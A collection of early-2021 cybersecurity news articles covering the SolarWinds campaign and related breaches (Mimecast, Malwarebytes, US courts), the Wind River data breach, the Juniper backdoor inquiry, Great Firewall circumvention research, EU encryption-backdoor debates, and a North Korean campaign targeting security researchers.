2.2.2021 BigBrothers Threatpost
Wind River Systems is warning of a ‘security incident’ after one or more files was downloaded from its network.
Wind River Systems, which develops embedded system software, on Friday warned of a “security incident” that had exposed personnel records.
One or more files were downloaded from the company’s network on or around September 29, it said. Affected data included information maintained within the company’s personnel records – including critical data like Social-Security numbers, driver’s license numbers and passport numbers.
“We have been working with law enforcement and outside experts to investigate a security incident that occurred toward the end of September,” according to the security-incident notice, filed with California’s Attorney General as part of the state’s data-breach notification requirements. “We have no indication that any information in these files has been misused.”
Alameda, Calif.-based Wind River develops software for embedded systems, such as Wind River Linux, its embedded Linux development platform. Embedded systems are microprocessor units on a chip that serve a dedicated function within a larger system.
The company is also known for industry-specific software offerings for the aerospace and defense, industrial and automotive fields, for instance.
Wind River said that the full scope of information affected includes dates of birth, SSNs, social insurance, driver’s license or national identification numbers, passport or visa numbers, health information or financial account information. It’s not stated which specific health information is affected. If accessed this type of data can provide cybercriminals the tools that they need for identity-theft attacks, phishing scams and more.
It’s unclear how many are affected, and if those affected include any clients. As of 2018, the company had 1,200 employees. What’s also not stated is the context around how the files were downloaded from Wind River’s network.
Threatpost has reached out to Wind River for further details.
The company said in its notification that it is not aware of any “actual or attempted misuse” of personal information as a result of the event. “Recent searches by our experts did not uncover any of these files online,” according to Wind River.
The company said that it has installed additional security monitoring tools and implemented new processes as a result of the incident. In the meantime, it is telling those affected to remain vigilant by monitoring their credit reports.
Wind River said it “will continue to focus on improving the cyber-resiliency and security posture of our company.”
Wind River has previously dealt with various security incidents. In 2019, researchers said that Wind River VxWorks versions that include the IPnet stack are affected by a group of bugs collectively called “URGENT/11.” In 2015, a TCP prediction vulnerability was found in Wind River’s widely deployed VxWorks embedded software that could enable an attacker to disrupt or spoof the TCP connections to and from target devices.
CISA: Many victims of SolarWinds hackers had no direct connection to SolarWinds
2.2.2021 BigBrothers Securityaffairs
The U.S. CISA reveals that many of the victims of the SolarWinds hackers had no direct connection to SolarWinds.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) revealed that many of the organizations targeted by SolarWinds hackers had not direct link to the supply chain attack.
“While the supply chain compromise of SolarWinds first highlighted the significance of this cyber incident, our response has identified the use of multiple additional initial infection vectors. We have found that significant numbers of both the private-sector and government victims linked to this campaign had no direct connection to SolarWinds,” a CISA spokesperson told SecurityWeek.
“This is an ongoing response, and we are still working with our government and private sector partners to fully understand this campaign, and to develop and share timely information to mitigate the threat posed by this adversary,”
CISA’s acting director, Brandon Wales, told The Wall Street Journal that about a third of the victims were not using the Orion software.
According to Wales, some victims were compromised before the threat group started the supply chain attack.
“The attackers “gained access to their targets in a variety of ways. This adversary has been creative,” said Mr. Wales, whose agency, part of the U.S. Department of Homeland Security, is coordinating the government response. “It is absolutely correct that this campaign should not be thought of as the SolarWinds campaign.”” reported the WSJ.
Researchers from cybersecurity firm Volexity reported that SolarWinds hackers compromised a U.S. think tank several times, but they exploited the compromised SolarWinds supply chain in just one case.
In Mid-January, security firm Malwarebytes revealed that SolarWinds hackers also breached its systems and gained access to its email.
The intrusion took place last year, the company pointed out that hackers exploited another attack vector and did not use SolarWinds Orion software.
The intruders compromised some internal systems by exploiting a weakness in Azure Active Directory and abused malicious Office 365 applications.
“We continue to maintain that this is an espionage campaign designed for long-term intelligence collection,” Mr. Wales concluded. “That said, when you compromise an agency’s authentication infrastructure, there is a lot of damage you could do.”
Lawmakers Ask NSA About Its Role in Juniper Backdoor Discovered in 2015
2.2.2021 BigBrothers Securityweek
Several U.S. lawmakers sent a letter to the National Security Agency last week in an effort to find out more about its role in the backdoor discovered in Juniper Networks products back in 2015, as well as the steps taken by the agency following the Juniper incident, and why those steps failed to prevent the recent SolarWinds hack.
In late 2015, Juniper Networks informed customers that it had discovered unauthorized code in some versions of its ScreenOS operating system, which powered the company’s firewalls. The code introduced a vulnerability that could be exploited to gain remote access to a device, and a vulnerability that could have been leveraged to decrypt VPN traffic.
The VPN issue was related to the use of Dual Elliptic Curve Deterministic Random Bit Generator (Dual EC DRBG), a NIST-approved cryptographic algorithm that had been known to contain a backdoor introduced by the NSA. Juniper had made some changes to prevent abuse, but the malicious code enabled the backdoor. Some speculated that the intelligence agency was responsible for the unauthorized code, but Juniper believed it was likely targeted by a foreign government.
Similar to the recent SolarWinds hack, in which attackers, believed to be backed by Russia, delivered malicious updates to many of the company’s customers, the Juniper backdoor was also delivered to many government and private organizations in the United States, either via security updates or new products.
A few months ago, a group of three senators and 13 members of the U.S. House of Representatives sent a letter to Juniper, asking the company about the results of its investigation into that incident. Juniper said it added support for Dual EC DRBG at the request of a customer, but did not say who that customer was or whether the customer was a U.S. government agency. The company said none of the people involved in the decision to use the problematic cryptographic algorithm still works there.
Senators and House members have now sent a letter to the NSA in an effort to learn more about the agency’s role in the Juniper incident.
In their letter, the lawmakers noted that the Juniper backdoor may have allowed a foreign government or a different adversary to hack into the communications of many businesses and government agencies. They have asked the NSA to describe the steps it took following the disclosure of the Juniper incident to protect government agencies, and why those measures haven’t prevented the recent SolarWinds supply chain attack.
The NSA has also been instructed to share more information regarding its development and use of the algorithm, and say whether it was the customer that asked Juniper to add support for it in its products.
The lawmakers are also interested in finding out why the NSA thought it would be legal to introduce a backdoor into an algorithm approved by the U.S. government, and who it would need approval from if it wanted to introduce backdoors or other vulnerabilities into government standards.
The NSA has been given until February 26 to provide unclassified answers.
Russian Hack Brings Changes, Uncertainty to US Court System
2.2.2021 BigBrothers Securityweek
Trial lawyer Robert Fisher is handling one of America’s most prominent counterintelligence cases, defending an MIT scientist charged with secretly helping China. But how he’ll handle the logistics of the case could feel old school: Under new court rules, he’ll have to print out any highly sensitive documents and hand-deliver them to the courthouse.
Until recently, even the most secretive material — about wiretaps, witnesses and national security concerns – could be filed electronically. But that changed after the massive Russian hacking campaign that breached the U.S. court system’s electronic case files and those of scores of other federal agencies and private companies.
The new rules for filing sensitive documents are one of the clearest ways the hack has affected the court system. But the full impact remains unknown. Hackers probably gained access to the vast trove of confidential information hidden in sealed documents, including trade secrets, espionage targets, whistleblower reports and arrest warrants. It could take years to learn what information was obtained and what hackers are doing with it.
It’s also not clear that the intrusion has been stopped, prompting the rules on paper filings. Those documents are now uploaded to a stand-alone computer at the courthouse — one not connected to the network or Internet. That means lawyers cannot access the documents from outside the courthouse.
Fisher is defending Gang Chen, a nanotechnology researcher fighting charges that he defrauded the U.S.
“It would be cumbersome if we do have to start filing pleadings during the litigation on paper. That’s going to be more difficult,” Fisher said. “Particularly during COVID. Most of us are working from home.”
The Russian intrusion through the SolarWinds software has President Joe Biden in an early tussle with his Russian counterpart, President Vladimir Putin, and U.S. senators are worried about the “grave risk” to U.S. intelligence.
The Administrative Office of U.S. Courts confirmed the court system breach on Jan. 6, joining a victims’ list that includes the State Department, the National Institutes of Health, tech companies and an unknown number of Fortune 500 companies. U.S. officials have linked the effort, which went on for much of 2020, to elite Russia hackers.
“I don’t think we know what motivated the Russians in this case to target the court system — whether it was a target of opportunity enabled by this SolarWinds breach, or whether it was a ... priority,” said Ben Buchanan, who teaches cyberespionage at Georgetown University’s School of Foreign Service.
Though the entry point in the SolarWinds network software has been plugged, “it is really hard to kick the Russians out once they’re in,” he said.
Federal court operations are largely decentralized. Each of the 13 circuits adopts its own rules and security measures. Some courts encrypt documents filed under seal, but others do not, according to court employees who spoke with The Associated Press on condition of anonymity because they were not authorized to publicly discuss the security breach.
Either way, anyone sophisticated enough to launch the SolarWinds attack can probably decrypt data, perhaps by stealing an authorized user’s credentials, experts said. Targets could include not just court staff, but also “soft targets” such as law firms that upload files to the case management system, known as CM/ECF.
Criminal, civil and bankruptcy filings are believed to have been compromised, but not the Foreign Intelligence Surveillance Court system, which handles national security surveillance warrants, according to the court employees.
Senators are pressing court officials and the Justice Department for a clear assessment of the damage to the legal system.
“I fear that we do not know how Russia could take advantage of the access and information it may have obtained, and we likely won’t know until it’s far too late,” Sen. Richard Blumenthal, D-Conn., told The Associated Press in a statement. “The cleanup of this breach will be extraordinarily difficult ..., but we cannot cut corners and just hope that the Russians left.”
Some worry that the new rules will reduce public access to court proceedings, but they could also make judges rethink whether a seal or paper filing is really necessary. Court transparency advocates feel that judges have been on a sealing binge in recent years, keeping the public in the dark about important evidence in product liability, public corruption and other cases.
But others say the need for privacy is real, especially when it comes to corporate fights over patent secrets or other intellectual property, or whistleblower complaints, which remain secret while the government investigates. They fear that companies could be shaken down or see their stock price plummet if the information is exposed.
“There’s an underlying concern about what was breached. Our cases do ultimately come out from under seal, but the risk is a compromise in the interim, of a federal investigation or our clients,” said lawyer Erica Blachman Hitchings of the Whistleblower Law Collaborative in Boston.
Frank Montoya Jr., a retired FBI agent and counterterrorism expert, believes Russian officials will exploit whatever they can as they sift through the data, just as they did in 2016, when they leaked stolen Democratic National Committee emails during the U.S. presidential election. It could take years, or decades, to gauge their intent.
“We tend to still look at this stuff as spy versus spy. But the reality is, it’s not just about a specific targeted interest. It’s about exploiting everything to make money, to benefit the state, to undermine the U.S.,” he said.
But Georgetown’s Buchanan doesn’t see the Russian government selling trade secrets, even for something as valuable as the COVID-19 vaccine or a blockbuster drug. He believes it’s all about statecraft — and espionage.
Retired U.S. Circuit Judge Thomas Vanaskie, who led the U.S. Judicial Conference’s Information Technology Committee about 12 years ago, worries about the government’s duty to people who seek justice from the courts.
“We have assured counsel that you can file on our system, electronically, confidential material that will be sealed, and not subject to being hacked,” he said. “And here we are, hacked.”
CISA Says Many Victims of SolarWinds Hackers Had No Direct Link to SolarWinds
2.2.2021 BigBrothers Securityweek
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) says many of the victims of the threat group that targeted Texas-based IT management firm SolarWinds were not directly linked to SolarWinds.
“While the supply chain compromise of SolarWinds first highlighted the significance of this cyber incident, our response has identified the use of multiple additional initial infection vectors. We have found that significant numbers of both the private-sector and government victims linked to this campaign had no direct connection to SolarWinds,” a CISA spokesperson told SecurityWeek.
“This is an ongoing response, and we are still working with our government and private sector partners to fully understand this campaign, and to develop and share timely information to mitigate the threat posed by this adversary,” the agency said.
CISA’s acting director, Brandon Wales, told The Wall Street Journal last week that roughly 30% of the victims identified by the agency did not have a direct connection to SolarWinds. Wales also said some victims were compromised before SolarWinds started delivering malicious product updates to customers.
CISA warned shortly after the SolarWinds breach came to light that the supply chain compromise was not the only initial attack vector leveraged by the threat group, which the U.S. government and others have linked to Russia.
Threat intelligence and incident response firm Volexity reported that the same group, which it tracks as Dark Halo, hacked a U.S. think tank several times, but only one of their attack waves exploited the compromised SolarWinds supply chain.
The attackers have also been known to target organizations through Microsoft services and WSJ cited a person familiar with the SolarWinds investigation saying that SolarWinds has been trying to determine if its own network was initially breached through Microsoft services. Microsoft confirmed back in December that it had found some of the malicious SolarWinds files on its systems, but said it had found no evidence that its own systems were leveraged to target others.
Wales said Microsoft was the only cloud provider whose services were abused by the hackers and it did not appear that there was any other supply chain compromise aside from the one targeting SolarWinds.
Microsoft has been informing some companies that they have been targeted by the SolarWinds hackers through its cloud services. The list includes cybersecurity firms Malwarebytes, Mimecast and CrowdStrike.
Other cybersecurity firms targeted by the attackers or impacted to some extent include Palo Alto Networks, FireEye, Qualys and Fidelis Cybersecurity. Malwarebytes said it had not used any SolarWinds products, while Qualys and Fidelis said they received the malicious software updates pushed out by the attackers due to the fact that they had been analyzing the software.
CISA did not clarify whether victims with “no direct connection to SolarWinds” included organizations that had received the malicious updates but did not actually use the software.
SolarWinds said the malicious updates, which targeted its Orion monitoring product, were sent to roughly 18,000 customers, but investigations conducted to date revealed that only a few hundred government and private sector organizations actually presented an interest to the attackers and received secondary payloads.
Experts explain how to bypass recent improvement of China’s Great Firewall
1.2.2021 BigBrothers Securityaffairs
Experts from Great Firewall Report analyzed recent upgrades to China’s Great Firewall and revealed that it can be circumvented.
Members of the Great Firewall Report group have analyzed the recent improvement implemented for China’s Great Firewall censorship system and revealed that it is possible to bypass it.
Last year, the group published a detailed analysis on how the Chinese government has improved its surveillance system to detect and block the popular circumvention tools Shadowsocks and its variants.
“Using measurement experiments, we find that the GFW uses the length and entropy of the first data packet in each connection to identify probable Shadowsocks traffic, then sends seven different types of active probes, in different stages, to the corresponding servers to test whether its guess is correct.” reads the paper published by the experts. “Based on our gained understanding, we present a temporary workaround that successfully mitigates the traffic analysis attack by the GFW”
Shadowsocks leverages SOCKS5 proxies outside China to avoid government censorship.
Shadowsocks is a free and open-source encryption protocol project, widely used in China to circumvent Internet censorship. It was created in 2012 by a Chinese programmer named “clowwindy“, and multiple implementations of the protocol have been made available since. Shadowsocks software allows to connect to a third party socks5 proxy, speaking the shadowsocks language on the machine it is running on, which internet traffic can then be directed towards, similarly to a Secure tunnel(SSH tunnel). Unlike an SSH tunnel,
In 2019, the Chinese authorities implemented the ability to detect Shadowsocks through traffic analysis and network probing, and block its connections.
Great Firewall Report experts revealed that recent versions of Shadowsocks (3.3.1 and earlier) could bypass the firewall.
“In this short post, we provide practical suggestions for non-technical users and circumvention tool developers to prevent their circumvention servers from being detected and blocked. We also introduce the mitigation to partitioning oracle attacks newly demonstrated by Len et al.. ” reads the post published by Great Firewall Report.
The post is a practical guide to defend against the GFW’s latest active probing, it includes a list of precautions that need to be taken to avoid censorship. The post also includes detailed instructions to build a Shadowsocks-compatible proxy server.
Encrypted Services Providers Concerned About EU Proposal for Encryption Backdoors
30.1.2021 BigBrothers Crypto Securityweek
European encrypted services providers ProtonMail, Threema, Tresorit and Tutanota on Thursday urged European Union policy makers to rethink plans that would require the implementation of encryption backdoors.
The Council of the European Union in December adopted a resolution on “security through encryption and security despite encryption.” The council said it supports the development and use of strong encryption to protect citizens and organizations, but at the same time it believes law enforcement and judicial authorities need to be able to exercise their legal powers.
There has been a lot of discussion over the past years about finding a balance between providing strong encryption to users while also enabling law enforcement to access encrypted communications and data during their investigations. However, while policymakers around the world are convinced that such a balance can somehow be achieved, tech companies say it’s impossible, as it would require the implementation of encryption backdoors that could be leveraged not only by law enforcement, but also by bad actors.
ProtonMail, Threema, Tresorit and Tutanota say they are concerned about the Council of the EU’s resolution and they have each issued a statement warning that the rights of EU citizens are under threat from these anti-encryption proposals.
“Whilst it’s not explicitly stated in the resolution, it’s widely understood that the proposal seeks to allow law enforcement access to encrypted platforms via backdoors. However, the resolution makes a fundamental misunderstanding: encryption is an absolute, data is either encrypted or it isn’t, users have privacy or they don’t,” said Tresorit, which provides end-to-end encrypted cloud storage for businesses.
Andy Yen, the CEO of encrypted email service ProtonMail, commented, “Put simply, the resolution is no different from the previous proposals which generated a wide backlash from privacy conscious companies, civil society members, experts and MEPs. The difference this time is that the Council has taken a more subtle approach and explicitly avoided using words like ‘ban’ or ‘backdoor’. But make no mistake, this is the intention. It’s important that steps are taken now to prevent these proposals going too far and keep European’s rights to privacy intact.”
Arne Möhle, CEO and founder of Tutanota, a free encrypted email service, warned about the implications for EU citizens.
“With the latest attempt to backdoor encryption, politicians want an easier way to prevent crimes such as terrorist attacks while disregarding an entire range of other crimes that encryption protects us from: End-to-end encryption protects our data and communication against eavesdroppers such as hackers, (foreign) governments, and terrorists. By demanding encryption backdoors, politicians are not asking us to choose between security and privacy. They are asking us to choose no security,” Möhle said.
And Martin Blatter, CEO and founder of secure messaging application Threema, warned about the implications for European businesses.
“Young European companies are now at the forefront of this revolution in technology and data protection. Experience shows that anything that weakens these achievements can and will be abused by third parties and criminals alike thus endangering the security of all of us. With the abundance of uncontrollable open-source alternatives, users would simply move on to those applications if they knew a service was compromised,” said Blatter.
He added, “Forcing European vendors to bypass or deliberately weaken end-to-end encryption would destroy the European IT startup economy without providing even one bit of additional security. Europe would recklessly abandon its unique competitive advantage and become a privacy wasteland, joining the ranks of the most notorious surveillance states in the process.”
While law enforcement agencies have often complained about not being able to conduct their investigations due to strong encryption, there is some evidence suggesting that at least some agencies, such as the FBI, do have the resources needed to access data from encrypted devices.
Mimecast Confirms SolarWinds Hack as List of Security Vendor Victims Snowball
29.1.2021 BigBrothers Threatpost
A growing number of cybersecurity vendors like CrowdStrike, Fidelis, FireEye, Malwarebytes, Palo Alto Networks and Qualys are confirming being targeted in the espionage attack.
The Mimecast certificate compromise reported earlier in January is part of the sprawling SolarWinds supply-chain attack, the security firm has confirmed.
Mimecast joins other cybersecurity vendors like CrowdStrike, Fidelis, FireEye, Malwarebytes, Palo Alto Networks and Qualys in being targeted in the attack.
A Mimecast-issued certificate used to authenticate some of the company’s products to Microsoft 365 Exchange Web Services had been “compromised by a sophisticated threat actor,” the email-protection company announced in mid-January. That caused speculation that the breach was related to SolarWinds, which the firm confirmed in an update this week.
“Our investigation has now confirmed that this incident is related to the SolarWinds Orion software compromise and was perpetrated by the same sophisticated threat actor,” it announced. “It is clear that this incident is part of a highly sophisticated large-scale attack and is focused on specific types of information and organizations.”
The SolarWinds espionage attack, which has affected several U.S. government agencies and many others, began with a poisoned software update that delivered the Sunburst backdoor to around 18,000 organizations last spring. After that broad-brush attack, the threat actors (believed to have links to Russia) selected specific targets to further infiltrate, which they did over the course of several months. The compromises were first discovered in December.
Exfiltrated Mimecast Customer Information
Mimecast provides email-security services that customers can apply to their Microsoft 365 accounts by establishing a connection to Mimecast’s servers. The certificate in question was used to verify and authenticate those connections made to Mimecast’s Sync and Recover (backups for mailbox folder structure, calendar content and contacts from Exchange On-Premises or Microsoft 365 mailboxes), Continuity Monitor (looks for disruptions in email traffic) and Internal Email Protect (IEP) (inspects internally generated emails for malicious links, attachments or for sensitive content).
A compromise means that cyberattackers could take over the connection, though which inbound and outbound mail flows, researchers said. It would be possible to intercept that traffic, or possibly to infiltrate customers’ Microsoft 365 Exchange Web Services and steal information. In this case, it appears that credentials were lifted.
“Our investigation also showed that the threat actor accessed, and potentially exfiltrated, certain encrypted service account credentials created by customers hosted in the United States and the United Kingdom,” the company said in its update. “These credentials establish connections from Mimecast tenants to on-premise and cloud services, which include LDAP, Azure Active Directory, Exchange Web Services, POP3 journaling, and SMTP-authenticated delivery routes.”
It added, “Although we are not aware that any of the encrypted credentials have been decrypted or misused, we are advising customers hosted in the United States and United Kingdom to take precautionary steps to reset their credentials.”
Threatpost reached out for further information, but did not immediately receive a response.
Mimecast Customer Mitigations
The hack was brought to Mimecast’s attention by Microsoft (itself a SolarWinds victim), which has disabled the certificate’s use for Microsoft 365.
Mimecast has also issued a new certificate and is urging users to re-establish their connections with the fresh authentication. It said in the update that “the vast majority of these customers have taken this action.”
Mimecast said that about 10 percent of its customers used the affected connections. It notes on its website that it has around 36,000 customers, so 3,600 could be potentially compromised. The company went on to say that out of those, “there are indications that a low single digit number of our customers’ Microsoft 365 tenants were targeted. We have already contacted these customers to remediate the issue.”
Malwarebytes, CrowdStrike Targeted via Email
Meanwhile, Malwarebytes last week confirmed that it too is a victim of the SolarWinds hackers – except that it wasn’t targeted through the SolarWinds platform.
“While Malwarebytes does not use SolarWinds, we, like many other companies were recently targeted by the same threat actor,” it disclosed in a Tuesday web posting.
Instead of using the SolarWinds Orion network-management system, the advanced persistent threat (APT) abused “applications with privileged access to Microsoft Office 365 and Azure environments,” the security firm said — specifically, an email-protection application. No data exfiltration occurred, however.
When asked if the Mimecast email-protection application was the attack vector, the answer was no.
“Mimecast was not related to our incident,” a Malwarebytes spokesperson told Threatpost. “However, any third-party application can be abused if an attacker with sufficient administrative privilege gains access to a tenant. Because this threat actor goes to great lengths to be as stealthy as possible, it is critical to reduce the surface of attack by disabling unneeded on-premises and in the cloud applications while enabling granular logging for those that remain.”
Similarly, CrowdStrike caught a reseller’s Microsoft Azure account used for managing CrowdStrike’s Microsoft Office licenses making abnormal calls to Microsoft cloud APIs.
“There was an attempt to read email, which failed as confirmed by Microsoft,” the company said in a blog post back in December. “As part of our secure IT architecture, CrowdStrike does not use Office 365 email.”
“They got in through the reseller’s access and tried to enable mail ‘read’ privileges,” a source told Reuters. “If it had been using Office 365 for email, it would have been game over.”
CrowdStrike declined to comment further on its attack.
Security Firms Battered in SolarWinds Gale
Mimecast joins FireEye in admitting actual damage from the attack. FireEye in December said that it had been hit in what CEO Kevin Mandia described as a highly targeted cyberattack. The attacker targeted and was able to access certain red-team assessment tools that the company uses to test its customers’ security.
The company soon confirmed that the attack was part of the SolarWinds supply-chain attack.
Other firms fall into the Malwarebytes camp – confirming having been targeted, but reporting that no damage was done.
“Qualys engineers downloaded the vulnerable/malicious SolarWinds Orion tool in our lab environment for testing, which is completely segregated from our production environment,” a spokesperson told Forbes this week. “Qualys’ in-depth investigations have concluded that there was no successful exfiltration of any data, even though the test system attempted to connect to the associated backdoor.”
Fidelis meanwhile announced in a blog post this week that it was also able to thwart bad consequences from the attack.
“Our current belief, subject to change given additional information, is that the test and evaluation machine where this software was installed was sufficiently isolated and powered up too infrequently for the attacker to take it to the next stage of the attack,” the firm wrote.
And Palo Alto Networks also said it was able to block the attack internally.
After the poisoned update, “our Security Operation Center then immediately isolated the server, initiated an investigation and verified our infrastructure was secure,” told Forbes. “Additionally, at this time, our SOC notified SolarWinds of the activity observed. The investigation by our SOC concluded that the attempted attack was unsuccessful and no data was compromised.”
It’s likely that other security firms will come to light as SolarWinds targets, according to Ami Luttwak, CTO and co-founder of Wiz.
“Why are the SolarWinds hackers going after security companies? When you piece together the puzzle it becomes scary,” Luttwak said via email. “They are trying to feed the beast, the more power they have, it gives them more tools and capabilities to attack more companies and get their capabilities as well. If we think about how this all started, they were after the FireEye tools… it’s like a game, they are attacking whoever has additional skills they can get.”
He added, “What does a company like Malwarebytes… have? Well… endless capabilities. Every sensitive computer out there runs a security agent, most of them even have a cloud portal that allows to run privileged commands on any computer directly.”
Many European CISOs Shift Focus to Mobile Security: Survey
29.1.2021 BigBrothers Securityweek
A majority of chief information security officers (CISOs) in Europe said their cybersecurity strategy now focuses on mobile devices as a result of employees increasingly working remotely due to the pandemic, IT management and cybersecurity solutions provider Ivanti said in a report published this week.
The information comes from a survey of 400 CISOs conducted in November and December 2020. The respondents worked for large enterprises in the UK, Germany, France, Spain, Italy and Benelux countries.
According to Ivanti’s report, which aims to promote the adoption of zero trust security strategies, 87% of CISOs said the focal point of their strategy is now mobile devices.
The biggest IT security challenges cited by respondents — during the pandemic — were the use of insecure Wi-Fi connections to access corporate assets (45%), employees using their own devices for work (40%), the use of unauthorized apps (33%), the use of public clouds to access business resources (33%), and mobile phishing attacks (32%).
“Unfortunately, hackers are taking advantage of security gaps in the everywhere enterprise by increasingly targeting mobile devices and applications with sophisticated phishing attacks,” Ivanti said in its report. “And these mobile phishing attacks are likely to succeed, as it is very hard to verify the authenticity of links on a mobile device. The mobile user interface also makes it difficult to access and view key information, while prompting users to make fast decisions.”
While 93% of respondents said they already had solutions in place to enable remote work when he pandemic started, a vast majority also admitted that more security measures are needed. Nearly two-thirds said they plan on investing in mobile threat detection software, and 57% said they were enhancing authentication to remote applications.
The survey shows that CISOs in Europe had, on average in 2020, a total IT security budget of roughly €65 million ($78 million), with much of it (41%) spent on unified endpoint management (UEM) solutions. However, a majority expect their budgets to increase in 2021 and they plan on increasing investment in specialized UEM solutions.
Eighty percent of respondents also believe that passwords are no longer effective for protecting enterprise data, and 70% of CISOs said they plan on investing more in biometric authentication tech.
North Korea Targets Security Researchers in Elaborate 0-Day Campaign
27.1.2021 BigBrothers Threatpost
Hackers masquerade as security researchers to befriend analysts and eventually infect fully patched systems at multiple firms with a malicious backdoor.
Hackers linked to North Korea are targeting security researchers with an elaborate social-engineering campaign that sets up trusted relationships with them — and then infects their organizations’ systems with custom backdoor malware.
That’s according to Google’s Threat Analysis Group (TAG), which issued a warning late Monday about a campaign it has tracked over the last several months that uses various means to interact with and attack professionals working on vulnerability research and development at multiple organizations.
The effort includes attackers going so far as to set up their own research blog, multiple Twitter profiles and other social-media accounts in order to look like legitimate security researchers themselves, according to a blog post by TAG’s Adam Weidermann. Hackers first establish communications with researchers in a way that looks like they are credibly working on similar projects, then they ask them to collaborate, and eventually infect victims’ machines.
The infections are propagated either through a malicious backdoor in a Visual Studio Project or via an infected website, he wrote. And moreover, those infected were running fully patched and up-to-date Windows 10 and Chrome browser versions — a signal that hackers likely are using zero-day vulnerabilities in the campaign, the researcher concluded.
TAG attributed the threat actors to “a government-backed entity based in North Korea.”
“They’ve used these Twitter profiles for posting links to their blog, posting videos of their claimed exploits, and for amplifying and retweeting posts from other accounts that they control,” according to the post. “Their blog contains write-ups and analysis of vulnerabilities that have been publicly disclosed, including ‘guest’ posts from unwitting legitimate security researchers, likely in an attempt to build additional credibility with other security researchers.”
In addition to Twitter, threat actors also used other platforms, including LinkedIn, Telegram, Discord, Keybase and email to communicate with potential targets, Weidermann said. So far it seems that only security researchers working on Windows machines have been targeted.
Making Connections
Attackers initiate contact by asking a researcher if he or she wants to collaborate on vulnerability research together. Threat actors appear to be credible researchers in their own right because they have already posted videos of exploits they’ve worked on, including faking the success of a working exploit for an existing and recently patched Windows Defender vulnerability, CVE-2021-1647, on YouTube.
The vulnerability received notoriety as one that has been exploited for the past three months and leveraged by hackers as part of the massive SolarWinds attack.
“In the video, they purported to show a successful working exploit that spawns a cmd.exe shell, but a careful review of the video shows the exploit is fake,” Weidermann explained.
If an unsuspecting targeted researcher agrees to collaborate, attackers then provide the researcher with a Visual Studio Project infected with malicious code. Several targets took to Twitter to describe their experiences.
“Within the Visual Studio Project would be source code for exploiting the vulnerability, as well as an additional DLL that would be executed through Visual Studio Build Events,” Weidermann wrote. “The DLL is custom malware that would immediately begin communicating with actor-controlled command-and-control (C2) domains.”
Victims also can be infected by following a Twitter link hosted on blog.br0vvnn[.]io to visit a threat actor’s blog, according to TAG. Accessing the link installs a malicious service on the researcher’s system that executes an in-memory backdoor that establishes a connection to an actor-owned C2 server, researchers discovered.
The TAG team so far could not confirm the mechanism of compromise, asking for help from the greater security community to identify and submit information through the Chrome Vulnerability Reward Program.
Researchers also did not specifically say what the likely motive was for the attacks; however, presumably the threat actors aim to uncover and steal vulnerabilities to use in North Korean advanced persistent threat (APT) campaigns.
Weidermann’s post includes a list of known accounts being used in the campaign, and he advised researchers who may have communicated with any of the accounts or visited related sites to review their systems for compromise.
“We hope this post will remind those in the security research community that they are targets to government-backed attackers and should remain vigilant when engaging with individuals they have not previously interacted with,” Weidermann wrote.
North Korea-linked campaign targets security experts via social media
27.1.2021 BigBrothers Securityaffairs
Google TAG is warning that North Korea-linked hackers targeting security researchers through social media.
Google Threat Analysis Group (TAG) is warning that North Korea-linked hackers targeting security researchers through social media.
According to the Google team that focuses on nation-state attacks, a North Korea-linked APT group has targeted experts that are working on the research of security vulnerability.
“Over the past several months, the Threat Analysis Group has identified an ongoing campaign targeting security researchers working on vulnerability research and development at different companies and organizations.” reads the TAG’s report. “The actors behind this campaign, which we attribute to a government-backed entity based in North Korea, have employed a number of means to target researchers”
The attackers targeted the researchers through multiple social networking platforms, including Twitter, LinkedIn, Telegram, Discord, and Keybase.
Threat actors used a network of fake profiles to get in contact with researchers of interest, in some cases the victims were also contacted via email.
In an attempt to get in contact with security researchers, the threat actors created a research blog and used a network of Twitter profiles to interact with potential targets. Attackers used Twitter profiles for sharing links to their blog, to share videos of their claimed exploits, and for amplifying and retweeting posts from other accounts under their control.
“The actors have been observed targeting specific security researchers by a novel social engineering method.” continues the post. “After establishing initial communications, the actors would ask the targeted researcher if they wanted to collaborate on vulnerability research together, and then provide the researcher with a Visual Studio Project.”
The Visual Studio project used by the attackers included the source code for exploiting the vulnerability along with an additional DLL that would be executed through Visual Studio Build Events, which is a backdoor.
Experts also reported that threat actors used social engineering attacks to target the researchers. The experts noticed that attackers conducted watering hole attacks, victims were compromised after visiting the threat actors’ blog. The attackers have shared a link on Twitter to a post on blog.br0vvnn[.]io, the site was designed to deliver a malicious service on the researcher’s system and inject a backdoor directly into the memory of the target system.
Google TAG experts noticed that this mechanism likely involved zero-day exploits because its was able to infect visitors using fully patched and up-to-date Windows 10 and Chrome browser versions.
“At the time of these visits, the victim systems were running fully patched and up-to-date Windows 10 and Chrome browser versions. At this time we’re unable to confirm the mechanism of compromise, but we welcome any information others might have. Chrome vulnerabilities, including those being exploited in the wild (ITW), are eligible for reward payout under Chrome’s Vulnerability Reward Program.” continues the report. “We encourage anyone who discovers a Chrome vulnerability to report that activity via the Chrome VRP submission process.”
Google TAG experts call to action the cybersecurity community to share details about these recent attacks.
Google TAG report includes a list of actor controlled sites and accounts and is inviting security researchers to review their online activities and contacts to discover if they gave interacted in some ways with these threat actors.
Security researchers are advised to review their browsing histories and see if they interacted with the threat actors.
“If you have communicated with any of these accounts or visited the actors’ blog, we suggest you review your systems for the IOCs provided below. To date, we have only seen these actors targeting Windows systems as a part of this campaign.” concludes Google.
“If you are concerned that you are being targeted, we recommend that you compartmentalize your research activities using separate physical or virtual machines for general web browsing, interacting with others in the research community, accepting files from third parties and your own security research.”
Outgoing FCC Chair Issues Final Security Salvo Against China
26.1.2021 BigBrothers Threatpost
Ajit Pai says Chinese telecom companies ‘biggest national security threat’ for regulators in exit interview.
Outgoing Federal Communications Chair Ajit Pai has issued a final warning about Chinese telcos at the end of a tenure spent cracking down on companies like Huawei, ZTE and China Telecom.
Pai, a former telecommunications industry lobbyist and in-house counsel for Verizon, told Reuters that managing security threats against U.S. networks from Chinese espionage will be the “biggest national security issue that regulators will face in the next four years.”
Pai has spent a significant amount of time and energy at the FCC trying to block Chinese telecommunications companies from selling their hardware into communications networks in America — including devices, switches and routers. Pai posits that these companies are reportedly controlled by the Chinese government and are suspected to have backdoors and other loopholes built into the products to allow the Chinese to spy on Americans.
“The Chinese Communist Party has a very determined world view,” Pai told Reuters. “They want to dominate this space and exert their will — even beyond their own borders. That is a serious threat not just to internet freedom but to national security for us and for many of our allies.”
The Chinese government and these companies, for their part, have denied all allegations of backdoors and espionage associated with their equipment. Huawei and ZTE also remain top movers in the 5G network-building space worldwide.
